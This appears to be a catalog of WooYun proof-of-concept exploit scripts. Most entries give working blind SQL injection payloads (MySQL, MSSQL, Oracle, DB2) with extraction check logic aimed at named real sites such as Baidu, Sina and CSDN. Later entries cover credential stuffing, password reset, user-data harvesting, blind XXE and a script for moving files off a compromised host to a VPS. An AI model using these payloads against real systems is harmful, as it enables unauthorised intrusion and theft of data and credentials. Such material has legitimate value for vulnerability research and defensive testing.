POC && EXP

Columns: script number | injection type | script feature (payload, request lines, and the script's check logic) | notes
1. wooyun-2010-0126775
   Type: GET
   Payload: (ascii(mid(user()from(%s)for(1)))=%s,benchmark(2000000,md5(1)),0)
   Check: if time.time() - t > 1.5

2. wooyun-2010-0120021
   Type: GET
   Payload: aaa'XOR(if(length(user())=20,sleep(3),0))OR'bbb
   Check: try: except:

3. wooyun-2010-0119102
   Type: GET / MySQL time blind
   Payload: (ascii(mid(user()from(%s)for(1)))=%s,benchmark(2000000,md5(1)),0)
   Payload: if(length(user())=22,sleep(2),0
   Check: try: except:
   Notes: The script also guesses user(); the threshold is set very low, with a 0.5-second timeout.
4. wooyun-2010-0118298
   Type: Host header injectable
   Request:
   GET / HTTP/1.1
   Host: www.baidu.com'or(length(user())=14)or'
   Referer: http://dns-ch.xinnet.com
   Check: if status == 302

5. wooyun-2010-0114907
   Type: GET
   Payload: if(ascii(mid(lower(user()),%s,1))=%s,benchmark(2000000,md5(1)),0)
   Check:
   if time.time() - start_time > 0.5:
       timeout_count += 1
   else:
       break
   if timeout_count == 3:
       user += payload
6. wooyun-2010-0114492
   Type: Cookie injection / MySQL bool blind
   Request:
   GET /cart/mini_cart_ajax HTTP/1.1
   Cookie: PHPSESSID=c6798728910c94d53a88cd8369b8def5; csdn_cart_user_id=1"%20OR%20length(user())=23--%20;
   Check: if len(html_doc) > 200:

7. wooyun-2010-0106276
   Type: POST
   Payload: aa'XOR(if(ascii(mid(lower(user()),%s,1))=%s,sleep(2),0))OR'bb
   Check: try: except:
   if err_count == 3:

8. wooyun-2010-0105690
   Type: GET
   Payload: if(ascii(mid(lower(user()),%s,1))=%s,sleep(4),0)
   Check: try: except:
9. wooyun-2010-0104621
   Type: Cookie injection / MySQL bool blind
   Request:
   GET /catering HTTP/1.1
   Cookie: PHPSESSID=5dc8189e97e848e3bcab3381649061af; SESSIONID=5dc8189e97e848e3bcab3381649061af; CITY_ID=*;
   Check: if html_doc.find(u'/merchant/detail?storeid=2059629') > 0:

10. wooyun-2010-0103884
   Type: POST / MySQL bool blind
   Payload: aa'XOR(if(length(user())=17,sleep(6),0))OR'bb
   Check: try: except:
   Notes: When the expression is True the delay exceeds 6 seconds; when it is False the delay is about 800 ms.

11. wooyun-2010-0103670
   Type: POST
   Payload: 123'xor(sleep(ascii(mid(lower(user()),%s,1))=%s))or
   Payload (commented out in the script): #"123'xor(if(%s,sleep(5),0)or'" % s
   Check: try: except:
12. wooyun-2010-095449
   Type: GET
   Payload: if(ascii(mid(lower(user()),%s,1))=%s,sleep(10),0)
   Check: try: except:

13. wooyun-2010-095438
   Type: POST
   Payload: aa'XOR(if("ascii(mid(lower(user()),%s,1))=%s",sleep(5),0))OR'bb
   Check: try: except:

14. wooyun-2010-095304
   Type: POST
   Payload: aa'XOR(if("ascii(mid(user(),%s,1))=%s",sleep(5),0))OR'bb
   Check: try: except:

15. wooyun-2010-095083
   Type: GET / MySQL bool blind
   Payload: 'XOR("ascii(mid(lower(user()),%s,1))=%s")OR'bb"
   Notes: Keyword indicating False: No matched winning logo designs

16. wooyun-2010-094912
   Type: POST / bool blind
   Payload: and substring(lower(system_user),%s,1)>'%s
   Notes: When the condition is True the page loads slowly, so this was used as a time-blind example to guess system_user.

17. wooyun-2010-094880
   Type: GET / MySQL bool blind
   Payload: aa'XOR(if("mid(lower(user()),%s,1))=%s",1,0))OR'bb
   Notes: Keyword indicating False: No matched winning logo designs
18. wooyun-2010-094603
   Type: GET
   Payload: /*'%2b(select(0)from(select(if("ascii(mid(user(),%s,1))=%s",sleep(5),0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/
   Check:
   if time.time() - start_time > 5:
       timeout_count += 1
       print '*',
   else:
       break
   if timeout_count == 2:
       user += payload

19. wooyun-2010-094467
   Type: POST / MySQL bool blind
   Payload: 'aa"XOR(if(ascii(mid(user()from(%s)for(1)))=%s,1,0))OR"bb
   Notes: True when "请输入新密码" ("please enter a new password") appears.

20. wooyun-2010-092463
   Type: POST
   Payload: %%' and ascii(substr(lower(user),%s,1))=%s and '%%'='
   Notes: IBM DB2 database.

21. wooyun-2010-090164
   Type: GET
   Payload: %s"XOR(sleep(ascii(mid(lower(user())from(%s)for(1)))=%s))OR"bb' % (random.random(), i, ord(payload))

22. wooyun-2010-089831
   Type: POST / MySQL bool blind
   Payload: 1 or ascii(mid(lower(user())from(%s)for(1)))=%s
   Check: if html_doc != '0,0,0,0,0,0,0,0,0,0': # True
23. wooyun-2010-089924
   Type: GET
   Payload: /aaa'XOR(if(ascii(mid(user()from(%s)for(1)))=%s,sleep(3),3))OR'bb/
   Notes: Injection format: http://m.soccer.sina.com.hk/t/<injection statement>

24. wooyun-2010-089917
   Type: POST
   Payload: aa"XOR(if(ascii(mid(lower(user())from(%s)for(1)))=%s,sleep(3),0))OR"bb
   Check: try: except:
   if timeout_count == 3:

25. wooyun-2010-089826
   Type: GET
   Payload: if(ascii(mid(user()from(%s)for(1)))=%s,sleep(1),3)

26. wooyun-2010-089469
   Type: GET
   Payload: http://zhidao.baidu.com/c/ah189 and mid(lower(database()),1,1)="c" and "1"="1
   Check: if html_doc.find(u'安徽电信企业平台_企业知道_百度知道') > 0:

27. wooyun-2010-089304
   Type: POST
   Payload: 123'XOR(if(ascii(mid(lower(user())from(%s)for(1)))=%s,sleep(5),0))OR'bbb
   Check: raise Exception('oooooooops')
   Notes: The sid in the POST data must be re-fetched on every request. Classic bypass.
28. wooyun-2010-088834
   Type: GET
   Payload: if (ascii(substring(system_user,%s,1))=%s) waitfor delay '0:0:3' --

29. wooyun-2010-088750
   Type: POST
   Payload: if(ascii(mid(lower(user())from(%s)for(1)))=%s,sleep(3),0)

30. wooyun-2010-088431
   Type: GET
   Payload: 123'XOR(if(ascii(mid(lower(user())from(%s)for(1)))=%s,sleep(5),0))OR'bbb

31. wooyun-2010-088294
   Type: POST / Oracle bool blind
   Payload: ' OR ascii(substr(SYS_CONTEXT('USERENV','CURRENT_USER'),%s,1))=%s AND 1=1 --
   Notes: current_user has length 5. Oracle database.

32. wooyun-2010-088037
   Type: Cookie injection / MySQL bool blind
   Payload: ' OR ascii(mid(database(),%s,1))=%s AND 1=1 --
   Notes: When the expression is True the page returns 302; when False it returns 200. The BAIDUID cookie is injectable.

33. wooyun-2010-087980
   Type: Referer header injectable
   Payload: str(random.random()) + "aaa'XOR(if(ascii(mid(user(),%s,1))=%s,sleep(1),0))OR'bbb"
   Request:
   GET / HTTP/1.1
   Referer: aaa*
34. wooyun-2010-087825
   Type: GET
   Payload: 'XOR(if(ascii(mid(user(),%s,1))=%s,sleep(2),0))OR'bbb
   Check: try: except:
   Notes: If the script reports false positives, it is because too many threads are stuck and the database has become unstable.

35. wooyun-2010-087531
   Type: GET / MySQL bool blind
   Payload: (ascii(mid(user(),%s,1))=%s)
   Notes: When True, the page shows the photo div class="upload_one".

36. wooyun-2010-087520
   Type: GET
   Payload: "%saa'+(select(0)from(select(sleep(if(ascii(mid(user(),%s,1))=%s,5,0))))v)+'bb" % (rand_num, i, ord(payload))
   Check:
   if resp.status == 502:
       raise Exception('ooooooooops')
   print '.',
   except Exception, e:
       user += payload

37. wooyun-2010-086762
   Type: GET
   Payload: if(ascii(mid(user(),%s,1))=%s,sleep(1),0)

38. wooyun-2010-086516
   Type: GET
   Payload: sleep(1-abs(sign(ascii(mid(lower(user())from(%s)for(1)))-%s)))
   Notes: Injection without an equals sign. A single character is guessed through sleep(): the ASCII code of one character is compared against each ASCII code in the list, and the absolute value of the sign of the difference is taken. If they are equal (True), the sign is 0 and its absolute value is 0, so the query delays; if they differ, the sign is 1 or -1, the absolute value is 1, and there is no delay.
39. wooyun-2010-086372
   Type: GET / MySQL bool blind
   Payload: " AND ascii(mid(lower(user())from(%s)for(1)))=%s AND "123"="123
   Check: if html_doc.find(u'搜索时间') > 0:

40. wooyun-2010-084379
   Type: GET
   Payload: if(ascii(mid(user(),%s,1))=%s,sleep(1),0)
   Notes: By the time the 10th character was being guessed the MySQL server had already gone down; not pursued further.

41. wooyun-2010-084801
   Type: GET
   Payload: sleep(ascii(mid(lower(user())from(%s)for(1)))=%s)
   Notes: The page checks the Referer, which must be set during testing.

42. wooyun-2010-083899
   Type: GET / MySQL bool blind
   Payload: ??
   Notes: True when "韩都衣舍" appears in the page.

43. wooyun-2010-083813
   Type: X-Forwarded-For header injectable / MSSQL
   Payload: str(random.random()) + "127.0.0.1'); if (ascii(substring(@@version,%s,1))=%s) waitfor delay '0:0:3' -- "
   Request header: X-Forwarded-For: 127.0.0.1'); waitfor delay '0:0:1' --
   Notes: Current user is sa; the script tries to find the SQL Server version.

44. wooyun-2010-083715
   Type: GET / MySQL bool blind
   Payload: AND ascii(mid(user()from(%s)for(1)))=%s AND 'aaa'='aaa
   Notes: A fairly hidden injection point: at first glance the page looks no different. Viewing the page source (right-click, view source) shows that line 757 differs. Bool blind: True when "城北" appears.
45. wooyun-2010-083376
   Type: MySQL time-based blind / MySQL bool blind
   Payload: and ascii(mid(user()from(%s)for(1)))=%s and '1'='1
   Notes: Time-based blind was tested first, but once about 10 sleep() calls were stuck every page that takes parameters went down, so boolean-based MySQL injection was used in the end.

46. wooyun-2010-083257
   Type: POST (classic)
   Payload: sleep(ascii(mid(user()from(%s)for(1)))=%s)
   Notes: The backend is unstable and returns 404 with some probability, so the HTTP request check was written as a separate function: 404 is ignored and only 200 and 502 are handled. A small trick: a single sleep(1=1) does not necessarily make the backend time out with 502, so three sleep() calls are added together to guarantee the backend returns 502.

47. wooyun-2010-082740
   Type: GET
   Payload: 'XOR(if(ascii(mid(user(),%s,1))=%s,sleep(4),0))OR'bbb

48. wooyun-2010-083899
   Type: GET
   Payload: if (ascii(substring(@@version,%s,1))=%s) waitfor delay '0:0:5' --
   Notes: MSSQL; the script retrieves the SQL Server version.

49. wooyun-2010-082690
   Type: GET
   Payload: 'XOR(if(ascii(mid(user(),%s,1))=%s,sleep(4),0))OR'bbb
50. wooyun-2010-082564
   Type: POST / MySQL bool blind
   Payload: AND ascii(substr(SYS_CONTEXT('USERENV','CURRENT_USER'),%s,1))=%s--
   Notes: If the page returns the destination "广州" (Guangzhou), the result is True.

51. wooyun-2010-081949
   Type: GET (classic bypass)
   Payload: sleep(ascii(mid(user()from(%s)for(1)))=%s)
   Notes: A Discuz injection introduced by Lenovo's custom development on the ThinkPad forum; some SQL keywords such as select are filtered as well, so error-based injection is of limited use.

52. wooyun-2010-081844
   Type: Cookie injection
   Payload: if (ascii(substring(@@version,%s,1))=%s) waitfor delay '0:0:5' --
   Notes: MSSQL database. SQL Server version is Microsoft SQL Server 2008 SP

53. wooyun-2010-081815
   Type: POST
   Payload: if (ascii(substring(@@version,%s,1))=%s) waitfor delay '0:0:5' --
   Notes: MSSQL database; the script retrieves the database version.

55. wooyun-2010-079379
   Type: GET
   Payload: (sleep(ascii(mid(user()from(%s)for(1)))=%s))
   Notes: Injectable without spaces or commas.
56. wooyun-2015-0137143
   Type: XML quadratic blowup DoS vulnerability
   Notes: PoC submitted via POST.

57. wooyun-2015-0100000
   Type: Credential stuffing
   Notes: Obtains large numbers of PNR codes by collision.

58. wooyun-2015-0109422
   Type: Arbitrary user password reset script
   Notes: Password format: $md5=md5(time().rand(0,100)); $md5='lock'.substr($md5,5,strlen($md5));

59. wooyun-2015-0119851
   Type: Credential stuffing
   Notes: After capturing the request with Burp Suite, userID turned out to be purely numeric and oldPwd brute-forceable, so user passwords could be reset.

60. wooyun-2015-0126008
   Type: Script for querying arbitrary users' information
   Notes: Viewing the page source shows the user's username, email, id and phone number in a hidden form.

61. wooyun-2016-0172227
   Type: Simple socket file-transfer script
   Notes: Put send.py on the compromised host and recv.py on the VPS. Penetration testing needs ideas.

62. wooyun-2015-0120222
   Type: Script for reading iOS BinaryCookies
   Notes: Tries to use the obtained cookies for unauthorized (privilege-escalated) operations.

63. wooyun-2014-088964
   Type: Credential stuffing
   Feature: name=<username>&pass=<MD5 hash of password>&action=login

64. wooyun-2015-0135483
   Type: Script for querying arbitrary users' information
   Notes: Uses an API to query any user's information.

65. wooyun-2015-0145012
   Type: Credential stuffing
   Notes: A design flaw in an enterprise mail system makes credential stuffing possible.

66. wooyun-2015-0105251
   Type: Query arbitrary users' information via an API
   Notes: Submission: urllib2.urlopen(req, data="")

67. wooyun-2015-0135615
   Type: Blind XXE
   Notes: Requesting http://**.**.**.**/kv?act=set&k={key}&v={value} sets a key-value pair on the remote host, and http://**.**.**.**/kv?act=get&k=<the key just set> shows whether the pair was set; this is how the vulnerability is verified.

68. wooyun-2015-0135356
   Type: Blind XXE
   Notes: Unsafe use of simplexml_load_string leads to XXE.